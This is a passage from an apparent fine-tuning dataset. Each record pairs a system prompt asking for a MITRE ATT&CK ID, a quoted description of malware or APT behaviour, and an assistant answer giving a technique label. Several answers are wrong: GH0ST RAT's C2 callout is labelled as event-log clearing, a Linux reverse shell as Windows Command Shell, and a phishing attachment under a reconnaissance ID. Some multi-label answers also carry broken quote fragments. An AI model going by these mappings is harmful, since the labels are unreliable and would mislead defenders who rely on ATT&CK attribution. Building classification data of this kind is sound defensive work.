- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can check if the explorer.exe process is responsible for calling its install function."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used stolen credentials to access administrative accounts within the domain."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used scheduled tasks to persist on victim systems."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peppy has the ability to execute shell commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OopsIE Trojan is configured to use a C2 server hosted at:www.msoffice365cdn[.]com The Trojan will construct specific URLs to communicate with the C2 server and parses the C2 server’s response looking for content within the tags and
"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1573 - Encrypted Channel', 'T1102 - Web Service', 'T1041 - Exfiltration Over C2 Channel', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Nefilim ransomware uses a batch file to stop services and kill processes in the local host. This batch file abuses taskill.exe using CMD to kill predefined services and processes in the target host. Nefilim distributes this batch file to multiple hosts using two batch files. One of the batch files uses the ‘copy’ command, and the other one uses WMI with hard-coded admin credentials."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can collect network connection information."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The variable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) - zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt - txt is uploaded to the control server"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data', 'T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named “Annual Bonus Report.doc”. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from previous TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by another malware like Emotet"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can enumerate the username on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can launch itself from a hollowed svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The uploader or malware the uploader uses command to delete the RAR archives after they have been exfiltrated."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the account name of the logged-in user and sends it to the C2."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used `move` to transfer files to a network share."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy's Delphi variant was packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINERACK can gather information on the victim username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron has used AES and XOR to decrypt configuration files and commands."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot can download additional files to a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"net view \\\\remotesystem\" and \"net share\" commands in Net can be used to find shared drives and directories on remote and local systems respectively."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver encrypts some of its files with XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry uses Tor for command and control traffic."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The original variant of FakeM encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation. Some variants of FakeM use RC4 to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot can identify the OS version, CPU, and other details from a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ‘tasklist’ command will use a WMI query or the “ps” command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar’s ‘cmd’ command will run commands using “cmd.exe” for Windows systems and “/bin/bash” for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used web shells for persistence or to ensure redundant access."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has queried the Cloud Instance Metadata API for cloud credentials."
- },
- {
- "role": "assistant",
- "content": "T1552.005 - Unsecured Credentials: Cloud Instance Metadata API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Andariel has limited its watering hole attacks to specific IP address ranges."
- },
- {
- "role": "assistant",
- "content": "T1590.005 - IP Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp checks for availability of specific ports on servers."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya can use valid credentials with PsExec or \"wmic\" to spread itself to remote systems."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "avoids analysis by encrypting all strings, internal files, configuration data."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some Volgmer variants also install .dll files as services with names generated by a list of hard-coded strings."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman has the ability to self-extract as a RAR archive."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “SYSTEM.zip” and “comps.zip"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can execute \"enum\" to enumerate files in storage on a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the open source tool Essential NetTools to map the network and build a list of targets."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) The following tools appear to be exclusive to TG-3390: OwaAuth web shell — A web shell and credential stealer deployed to Microsoft Exchange servers"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist has the ability to download additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors dumped LSASS process memory by using 'rundll32.exe' to execute the MiniDump function exported by the native Windows® DLL 'comsvcs.dll'."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques."
- },
- {
- "role": "assistant",
- "content": "T1127 - Trusted Developer Utilities Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RemoteUtilities can enumerate files and directories on a target machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has renamed the WinRAR utility to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Lazarus Group custom backdoor implant included a custom PE loader named \"Security Package\" that was added into the lsass.exe process via registry key."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has password-protected malicious Word documents and used base64 encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 can temporarily store files in a hidden directory on the local host."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker has used rundll32.exe to execute components of VirtualBox."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs uses HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps://s3[.]amazonaws[.]com/doclibrarysales/test[.]txt and then executes it"
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services', 'T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, REvil ransomware marks its binary code for deletion during the next reboot and terminates execution"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill can take screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker’s choice of IP addresses was also optimized to evade detection. The attacker primarily used only IP addresses originating from the same country as the victim, leveraging Virtual Private Servers"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer has copied itself to the \":bin\" alternate data stream of a newly created file."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maintain Presence APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has encrypted its binaries via AES and encoded files using Base64."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the Microsoft administration tool csvde.exe to export Active Directory data."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decrypting the C&C server address, the shellcode proceeds to send an HTTP GET request to fetch the resource: “msdn.cpp” on the server"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd can be used to copy files to/from a remotely connected internal system."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon exploitation, a GH0ST RAT variant is delivered to the victims’ system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code"
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 'T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After initialization, the code monitors browser activities, looking for online banking sessions. Once these are found, the malware enables the attacker to display an overlay window in front of the victim’s browser to manipulate the user’s session in the background. In this way, the fraudulent transaction is performed from the victim’s machine, making it harder to detect for anti-fraud solutions on the bank’s end. The criminal can also request specific information, asked during the bank transaction, such as a secondary password and token, bypassing two-factor authentication solutions adopted by the financial sector"
- },
- {
